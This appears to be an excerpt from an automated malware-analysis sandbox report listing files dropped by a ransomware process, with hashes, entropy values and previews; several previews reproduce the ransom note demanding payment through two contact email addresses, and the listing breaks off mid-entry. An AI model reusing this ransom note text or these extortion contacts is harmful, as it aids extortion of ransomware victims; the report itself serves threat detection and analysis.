                                                                                                    Entropy (8bit):7.956480722807559
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:LFfPom4rW8la5DGXaqMrLCpv5SOuNxo703McmQ2DEuqCG4:LJQpflMtwxSOC+mMcolVh
                                                                                                    MD5:4BEA384FAD324F11E1C9646E95631EDA
                                                                                                    SHA1:9B25D606EF1B75AB71021216542C89077481929E
                                                                                                    SHA-256:FEB95E45C104941546A069932CB1D1B78E99A624376890D207FFED2C53995568
                                                                                                    SHA-512:F3A0F603623F60FF91996B3B4CCD5F839FF9EFB9A82601B5503EB3E074D6D157A71BFF90C3CCA57D25DEEC02819506381212F91A077BB4623CE92A122FE7AAFA
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):131338
                                                                                                    Entropy (8bit):0.508656591287618
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:5hoA+/64ue8yKRet6scgWer7VBQgfEZZ6s+V8snO4:5uHi44y0et6sJrZeZZ6sZ4
                                                                                                    MD5:ED8A9102FE2E13FFE5C6E224143C2357
                                                                                                    SHA1:6463EB4BEDC97E7EED6BF9214F51113F26288FD2
                                                                                                    SHA-256:262E68516D3E7BE64581A906060AF3ED559E348ACC40D9645E111EE430613278
                                                                                                    SHA-512:BB739D406A7C950EEEA6A15BEE90FD521F5371CA63DD99BE04373DC9B71BCFE0D483D453F30E7FF24D6CA695594D0B46FAC268F15681F8EA354F528CECE04D7C
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):131338
                                                                                                    Entropy (8bit):0.508656591287618
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:5hoA+/64ue8yKRet6scgWer7VBQgfEZZ6s+V8snO4:5uHi44y0et6sJrZeZZ6sZ4
                                                                                                    MD5:ED8A9102FE2E13FFE5C6E224143C2357
                                                                                                    SHA1:6463EB4BEDC97E7EED6BF9214F51113F26288FD2
                                                                                                    SHA-256:262E68516D3E7BE64581A906060AF3ED559E348ACC40D9645E111EE430613278
                                                                                                    SHA-512:BB739D406A7C950EEEA6A15BEE90FD521F5371CA63DD99BE04373DC9B71BCFE0D483D453F30E7FF24D6CA695594D0B46FAC268F15681F8EA354F528CECE04D7C
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):302
                                                                                                    Entropy (8bit):7.237771183122865
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:agLsjwpuRg9/QxZHhQXO8Co2RrO7EU1KNz/+bGwBuRFkfjqGHe2n:dpuRg9/QjHhEV2RrO4cKhGbGzkfeQe2n
                                                                                                    MD5:A16F0677F7DBA977FEDAB734E6C38C23
                                                                                                    SHA1:9DEAAC31DDF26AB265BD177528A67F97CF2BA745
                                                                                                    SHA-256:0A6DE8CC1ADE73519B98070F4003B374F8CF21C14EF57F9A164147F483A15BBA
                                                                                                    SHA-512:1E9606B7F8BDD3A9E143F23BA9B46F183A6D950053BFF50B7265352A0BDD2C78874148D9A9D6FAA5131BD0CE7DC2A19D393F3EFE3416B09BFE3CF26BFE504DAD
                                                                                                    Malicious:true
                                                                                                    Preview:.62.\n....s~...........r.... r..ome..i.[6..9_$y.&.t..|s.?......./T...F..-d!h.[c...D.zk.r.%...|..4.%V.....7$'~...h..LV.H...+|....:..>.... RR....o..Mh.i.~.[.KBR.#.V9..........e.......mL.D..H.6.X..9..CX.U.$...c.jY._v.......3..M9.kM)1...f!..\6.f.....$w......t.U).>.n^mz .. .}.%...0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):302
                                                                                                    Entropy (8bit):7.237771183122865
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:agLsjwpuRg9/QxZHhQXO8Co2RrO7EU1KNz/+bGwBuRFkfjqGHe2n:dpuRg9/QjHhEV2RrO4cKhGbGzkfeQe2n
                                                                                                    MD5:A16F0677F7DBA977FEDAB734E6C38C23
                                                                                                    SHA1:9DEAAC31DDF26AB265BD177528A67F97CF2BA745
                                                                                                    SHA-256:0A6DE8CC1ADE73519B98070F4003B374F8CF21C14EF57F9A164147F483A15BBA
                                                                                                    SHA-512:1E9606B7F8BDD3A9E143F23BA9B46F183A6D950053BFF50B7265352A0BDD2C78874148D9A9D6FAA5131BD0CE7DC2A19D393F3EFE3416B09BFE3CF26BFE504DAD
                                                                                                    Malicious:false
                                                                                                    Preview:.62.\n....s~...........r.... r..ome..i.[6..9_$y.&.t..|s.?......./T...F..-d!h.[c...D.zk.r.%...|..4.%V.....7$'~...h..LV.H...+|....:..>.... RR....o..Mh.i.~.[.KBR.#.V9..........e.......mL.D..H.6.X..9..CX.U.$...c.jY._v.......3..M9.kM)1...f!..\6.f.....$w......t.U).>.n^mz .. .}.%...0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49418
                                                                                                    Entropy (8bit):1.1554299074783658
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:+rglCeDO/vMDYZ4kapWOWrHjlhhR5D7zOh95aT6HJsh3j1:+UlrDOHMDC4kZlx5DfK9HHJs1h
                                                                                                    MD5:3F879A18BC02691CC1E5354222D616D1
                                                                                                    SHA1:51A43EDF6B6595652136B9578BD48EDCA9FA8C8E
                                                                                                    SHA-256:B7008DA2FF703763120911A3F64E437580E04C6AB63A61EA78AF3A9BB9BA5EE3
                                                                                                    SHA-512:40698A530D16BBF0BDD15AAF891170C4786D593C29557CE1CB94ED6C7DC2935066473785315770886EB3F36C8340B650A8619B26C742BD696F90BD1D22732A20
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6054947345742925
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Rz9wSlq1EcrLCEDSAIR57GH0dfHz0o/UOjfsvYh0jKk:hauID3IR5SHYzWOwvYh0b
                                                                                                    MD5:B944A0D69CD29BC5FEF8138EEF9EF5B5
                                                                                                    SHA1:0E45C3E36B2C12DB13A5F4113CD57B78C8D696F6
                                                                                                    SHA-256:C72F8C936C44E4F330BAD8775EE325CEEE388EEF9F31A15383B0A97CA90B442B
                                                                                                    SHA-512:DCA780F3E1A064AAEE6A51B79637441519BDE60CAD839E8CBC427B525D4EE404CA18A97523C538974B4DD340CB7B2C9655CAD1F1446CBFE064DCEEDCE06E4F99
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6054947345742925
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Rz9wSlq1EcrLCEDSAIR57GH0dfHz0o/UOjfsvYh0jKk:hauID3IR5SHYzWOwvYh0b
                                                                                                    MD5:B944A0D69CD29BC5FEF8138EEF9EF5B5
                                                                                                    SHA1:0E45C3E36B2C12DB13A5F4113CD57B78C8D696F6
                                                                                                    SHA-256:C72F8C936C44E4F330BAD8775EE325CEEE388EEF9F31A15383B0A97CA90B442B
                                                                                                    SHA-512:DCA780F3E1A064AAEE6A51B79637441519BDE60CAD839E8CBC427B525D4EE404CA18A97523C538974B4DD340CB7B2C9655CAD1F1446CBFE064DCEEDCE06E4F99
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.181705453410326
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:MiA5TZ5dtlo2x6oq+rg9XBVne1Bz0CEpModJyp5isIjR5fa/jB/Ejkuon:MicTZvtljxXHrg1BA1Bwp5vsABa/jtE+
                                                                                                    MD5:173FBFA74F9F53042F12A680011429C9
                                                                                                    SHA1:3420C7D70AF04E275EE8D6772A9F51546D096586
                                                                                                    SHA-256:83082328984D09AD10ED0AABE709F9CBC2EDF1AA73A46382DAABDE03C9C13B57
                                                                                                    SHA-512:DF60D522CF1ADCA1334C79D71A1413751D3E1BF4E23B2EF2C8738F90523568199EE95E480AF21E9D7B399BF10B3B1C8ADE468CDB896393262595495E411C7E00
                                                                                                    Malicious:true
                                                                                                    Preview:..b.e...}L.|.. ..........xtD....Sq.d....>..H?..$S..ce ..y....=$....s..B....r.0k....m.)..."a$...X...<(..L.5....@.4y....GYE..Q=.\...Vh`..:..p5...V.7.l..Z...D..P.7.H.....=~...#Q..:..A.....M...U.?.5M....4g#/1b..1...k.M5...ZN.....?/..r...t....]..8...D.TyppL..JW......0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49418
                                                                                                    Entropy (8bit):1.1554299074783658
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:+rglCeDO/vMDYZ4kapWOWrHjlhhR5D7zOh95aT6HJsh3j1:+UlrDOHMDC4kZlx5DfK9HHJs1h
                                                                                                    MD5:3F879A18BC02691CC1E5354222D616D1
                                                                                                    SHA1:51A43EDF6B6595652136B9578BD48EDCA9FA8C8E
                                                                                                    SHA-256:B7008DA2FF703763120911A3F64E437580E04C6AB63A61EA78AF3A9BB9BA5EE3
                                                                                                    SHA-512:40698A530D16BBF0BDD15AAF891170C4786D593C29557CE1CB94ED6C7DC2935066473785315770886EB3F36C8340B650A8619B26C742BD696F90BD1D22732A20
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49418
                                                                                                    Entropy (8bit):1.1654411212483726
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Ut8meAIiWLG7hF2HHw3Wb/u62ROK3Q3BvKH3Cm:UqmNIA7hF2HHw3/RQBs
                                                                                                    MD5:C35C6B6D79B9FBF4EE60F48C1C925A18
                                                                                                    SHA1:3328F1147154D999A570EA6E3DF6C2315D28166A
                                                                                                    SHA-256:9E0B121A0CA155E4372C989980AC10AAC1D61681C6A086070ED5D1AE1A9125D5
                                                                                                    SHA-512:B2F22075D77CFD8E7322DB81D673D84BAAF4D9ECE931BB8DC056A4011D0E37AEB9C4C940972D7AEE54FD0B28492D75C356BFECE3203E9019015F16F70B1BF0EE
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6085478883507103
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:BEiVu2VyPvZfh3MfDuXKeejcFcUYjiGcpUfaogLjSb7JZtTx:BEiRyPvZfJMLiKrjcSUYj/U2ASRZj
                                                                                                    MD5:B362D870169E0BE5336A6F036E90038F
                                                                                                    SHA1:9CF674AA66E44808A6B7E7257F5495FC88E74AE8
                                                                                                    SHA-256:321AD17E2A4E377FEBDFF37906C6E2D09D596C7C65661DAFCCB4E75E1DEB337E
                                                                                                    SHA-512:C47A9ED69B64B25174DDC5578480B42FB23F0468AD378D3A71C7A44FEA1BEB62EEEF2334DE92F7E4DCFB066295F6920253617E60978CFF9C3DA40751462CA64F
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6085478883507103
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:BEiVu2VyPvZfh3MfDuXKeejcFcUYjiGcpUfaogLjSb7JZtTx:BEiRyPvZfJMLiKrjcSUYj/U2ASRZj
                                                                                                    MD5:B362D870169E0BE5336A6F036E90038F
                                                                                                    SHA1:9CF674AA66E44808A6B7E7257F5495FC88E74AE8
                                                                                                    SHA-256:321AD17E2A4E377FEBDFF37906C6E2D09D596C7C65661DAFCCB4E75E1DEB337E
                                                                                                    SHA-512:C47A9ED69B64B25174DDC5578480B42FB23F0468AD378D3A71C7A44FEA1BEB62EEEF2334DE92F7E4DCFB066295F6920253617E60978CFF9C3DA40751462CA64F
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.226343117096482
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:2xy/d86/Pkea29KyJiEV7Vs3DPo3TuuOYo+tz8A+5hHGn:H/d86/MeaOhQKqtYo+B+qn
                                                                                                    MD5:465BD75F88255B612D477FD5F79C7D58
                                                                                                    SHA1:2A1671F1B206F47DE43077EBBCDE4969A7F8D6FE
                                                                                                    SHA-256:266216F968617124F4A40D727092D482BE6F83D9B1421C5E1849D191ABA5C4F7
                                                                                                    SHA-512:C76306E6AB93992B7B2DF9FA739B530489B7CFCC5D7BDA79A589D5E35D4989667C10CEFE9F5335832D91ED30B148CEF8238C2943D9D48446B7383BAE40ADC749
                                                                                                    Malicious:true
                                                                                                    Preview:@...k=.$.G..K7U...........SC.....1.y_.......Z=...5fu...;..X.3._i....(...6...j'.V.....ZiM..z....&......J:2-.N.5...xI6.p..CF....&.....:3..)........M,.yr..J]......SN..B... .g....lI...wx0q.W..=...wF..VlK..HudYm.....wJ....D..o./Dt...{.T.T........F..w...SjV..Y..]........k.0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49418
                                                                                                    Entropy (8bit):1.1654411212483726
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Ut8meAIiWLG7hF2HHw3Wb/u62ROK3Q3BvKH3Cm:UqmNIA7hF2HHw3/RQBs
                                                                                                    MD5:C35C6B6D79B9FBF4EE60F48C1C925A18
                                                                                                    SHA1:3328F1147154D999A570EA6E3DF6C2315D28166A
                                                                                                    SHA-256:9E0B121A0CA155E4372C989980AC10AAC1D61681C6A086070ED5D1AE1A9125D5
                                                                                                    SHA-512:B2F22075D77CFD8E7322DB81D673D84BAAF4D9ECE931BB8DC056A4011D0E37AEB9C4C940972D7AEE54FD0B28492D75C356BFECE3203E9019015F16F70B1BF0EE
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49418
                                                                                                    Entropy (8bit):1.15234950588428
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:2iwN08Nga/LfYsgySWaQS0mmu3A7iqngxT+:233Ng9nT1F0mfugxS
                                                                                                    MD5:F8267AA4B6508FE91EE667F68F8303A9
                                                                                                    SHA1:3C616151940A4FA92B3D12133B75E0177246E44D
                                                                                                    SHA-256:508C9BC66AC4E1898F7AC45230E1239FF5D24999201B7BEF7A567353D952B4B7
                                                                                                    SHA-512:EDF6D129C3E3B772C9D719F11548A14D618414F4EBEEA6DA3317AD70CCC580A422601B07F844B345B632AD3620197A8C30797EDF7B084943B9E90464E89D0768
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6067803100560225
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:U1DyXj5qtuhGxeBj5vfa3aq4kdCU1l6FrDvtGLh43zK:U1DyT5qtuhtvUa8dL1MXWF
                                                                                                    MD5:79FB3EB3CE1B7C20483CBA9BB45912A7
                                                                                                    SHA1:83BC056B5026BEC95EF9A90B37717F3A95DA227B
                                                                                                    SHA-256:8EDFC927B47CC4BA9611D1BB4355AEE60DFF0CCDB934DF77E202733E758721E2
                                                                                                    SHA-512:32234640EDD907E78CE1DA67321267595BE4E6221E0EB3DABBEF9F2E569419142BD921C24404B9D65D372A414284E6C1BDD5A6373CFC29B25C5901B38AE5459F
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6067803100560225
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:U1DyXj5qtuhGxeBj5vfa3aq4kdCU1l6FrDvtGLh43zK:U1DyT5qtuhtvUa8dL1MXWF
                                                                                                    MD5:79FB3EB3CE1B7C20483CBA9BB45912A7
                                                                                                    SHA1:83BC056B5026BEC95EF9A90B37717F3A95DA227B
                                                                                                    SHA-256:8EDFC927B47CC4BA9611D1BB4355AEE60DFF0CCDB934DF77E202733E758721E2
                                                                                                    SHA-512:32234640EDD907E78CE1DA67321267595BE4E6221E0EB3DABBEF9F2E569419142BD921C24404B9D65D372A414284E6C1BDD5A6373CFC29B25C5901B38AE5459F
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.232508422095727
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ATa/CXd8SYM3KxSfb7pj/mRmkG3FyKqA0R9nbn9oMIo5Q4NZ/evn:Au/CuM3pfbNuRm9OA0Rhn9JLNdevn
                                                                                                    MD5:B651502DDB9DC33A102374F5D8FBE1C4
                                                                                                    SHA1:E53B2C3539D71D30D3BD7BF85FAEB6BE07EE8C2E
                                                                                                    SHA-256:075A775D329B802FBE39565CD06864A310B9EC341BB976DAE515F612F5B4763A
                                                                                                    SHA-512:D5BA9AC97718E4BEAB956AA154DCDE85AEE655B9C8EBD86F239319B4AAD1F803E4BDF415F198DAEF41E906755F10885D526627C58D99CE0BC5B6154355BA92F5
                                                                                                    Malicious:true
                                                                                                    Preview:..i....C....J...........p..........)...c.g.4Q.%1Q....w.7r .iS....._.h.G...h.rH.d:..`..\~...T..}.Y.P.L.6.c..F.oU..8...........h...V.C........oqB..q.c].u.M..4...,~&i......*{.k^9.|..b,.1....t...i.>A.....~..w...R..i.S.....O-p.....Df......Q|.a..G{.H.^.^@M.d.0XS.9..Gp0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49418
                                                                                                    Entropy (8bit):1.15234950588428
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:2iwN08Nga/LfYsgySWaQS0mmu3A7iqngxT+:233Ng9nT1F0mfugxS
                                                                                                    MD5:F8267AA4B6508FE91EE667F68F8303A9
                                                                                                    SHA1:3C616151940A4FA92B3D12133B75E0177246E44D
                                                                                                    SHA-256:508C9BC66AC4E1898F7AC45230E1239FF5D24999201B7BEF7A567353D952B4B7
                                                                                                    SHA-512:EDF6D129C3E3B772C9D719F11548A14D618414F4EBEEA6DA3317AD70CCC580A422601B07F844B345B632AD3620197A8C30797EDF7B084943B9E90464E89D0768
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49418
                                                                                                    Entropy (8bit):1.1809912695354934
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:z+I3GUALXuhAdOOMxtZcHwKrB+JZzl18p1kEIghDch:xiL+hKOOMxMHwVJZz/8p1kpghDch
                                                                                                    MD5:F5EAC1EB7778E62BBE6714027A6163B4
                                                                                                    SHA1:5813D6219B687054F510577E2E3FE7DA1583A861
                                                                                                    SHA-256:B2329D5AE8F43678E6D74B79AA4638D73D1B9007C75CE27D2FE9A26B86308C15
                                                                                                    SHA-512:4F7FBC2DCBDBB45731ECADEE69CCF2F40C3150600435A33B98641FA43C107FDBF3DD15D343CF66B54674C252A0D9A2E48C9464EBD2557A05AADC4E41769F01B3
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6102654917206927
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:JlGpx33oyfNElJhtAY0PyNSF0wDt+WpR/iOBd3f3oY4G6u+Pcp:JlGpODJhtP06S0wDt+KR/iOBdhvGcp
                                                                                                    MD5:581EA502A1FDA4430994366964645452
                                                                                                    SHA1:7D53EFBE64EA500BF220D1EB35B22C331DEB55E2
                                                                                                    SHA-256:38193A8DE82789BDC5833DB6540D7D10DE7F86A0146F48DD6DDA06BE669FD4DA
                                                                                                    SHA-512:63C0AA30B7475DC89C339A6DC305116F4DACBE897E378399EA1F1AEDC18C7A6B34A62BE8FF6E4F1E6B69940D7C85782D560F640678F88A87B88C4754EC331EC3
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6102654917206927
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:JlGpx33oyfNElJhtAY0PyNSF0wDt+WpR/iOBd3f3oY4G6u+Pcp:JlGpODJhtP06S0wDt+KR/iOBdhvGcp
                                                                                                    MD5:581EA502A1FDA4430994366964645452
                                                                                                    SHA1:7D53EFBE64EA500BF220D1EB35B22C331DEB55E2
                                                                                                    SHA-256:38193A8DE82789BDC5833DB6540D7D10DE7F86A0146F48DD6DDA06BE669FD4DA
                                                                                                    SHA-512:63C0AA30B7475DC89C339A6DC305116F4DACBE897E378399EA1F1AEDC18C7A6B34A62BE8FF6E4F1E6B69940D7C85782D560F640678F88A87B88C4754EC331EC3
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.016757518354228
                                                                                                    Encrypted:false
